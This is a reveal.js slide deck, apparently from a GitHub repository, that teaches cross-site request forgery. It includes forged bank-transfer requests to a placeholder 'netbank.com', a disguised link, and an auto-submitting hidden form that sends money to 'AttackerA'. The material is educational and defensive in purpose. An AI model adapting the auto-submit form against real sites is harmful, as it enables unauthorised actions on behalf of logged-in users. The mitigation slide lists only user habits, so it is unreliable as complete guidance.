-
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.html
78 lines (68 loc) · 2.48 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<title>Cross-site request forgery</title>
<link rel="stylesheet" href="dist/reset.css">
<link rel="stylesheet" href="dist/reveal.css">
<link rel="stylesheet" href="dist/theme/blood.css">
</head>
<body>
<div class="reveal">
<div class="slides">
<section>
<h1>CSRF</h1>
</section>
<section data-background-color="#515868">
<h3>What CSRF ?..</h3>
<section>
<p>Cross site request forgery (CSRF), also known as XSRF, Sea Surf or Session Riding, is an attack vector
that tricks a web browser into executing an unwanted action in an application to which a user is logged
in.</p>
</section>
<section><p>A successful CSRF attack can be devastating for both the business and user.</p></section>
</section>
<section data-background-color="#9015c6">
<h3>CSRF example</h3>
<section>Before executing an assault, a perpetrator typically studies an application in order to make a forged
request appear as legitimate as possible.
</section>
<section>
<pre>GET http://netbank.com/transfer.do?acct=PersonB&amount=$100 HTTP/1.1</pre>
</section>
<section>
<pre>GET http://netbank.com/transfer.do?acct=AttackerA&amount=$100 HTTP/1.1</pre>
</section>
<section>
<pre><a> href="http://netbank.com/transfer.do?acct=AttackerA&amount=$100">Read more!</a></pre>
</section>
<section>
<pre>
<body onload="document.forms[0].submit()">
<form action="http://netbank.com/transfer.do" method="POST">
<input type="hidden" name="acct" value="AttackerA"/>
<input type="hidden" name="amount" value="$100"/>
<input type="submit" value="View my pictures!"/>
</form>
</body>
</pre>
</section>
</section>
<section data-background-color=" #d4d43b">
<h3>Methods of CSRF mitigation</h3>
<ul>
<li>Logging off web applications when not in use</li>
<li>Securing usernames and passwords</li>
<li>Not allowing browsers to remember passwords</li>
<li>Avoiding simultaneously browsing while logged into an application</li>
</ul>
</section>
</div>
</div>
<script src="dist/reveal.js"></script>
<script>
Reveal.initialize();
</script>
</body>
</html>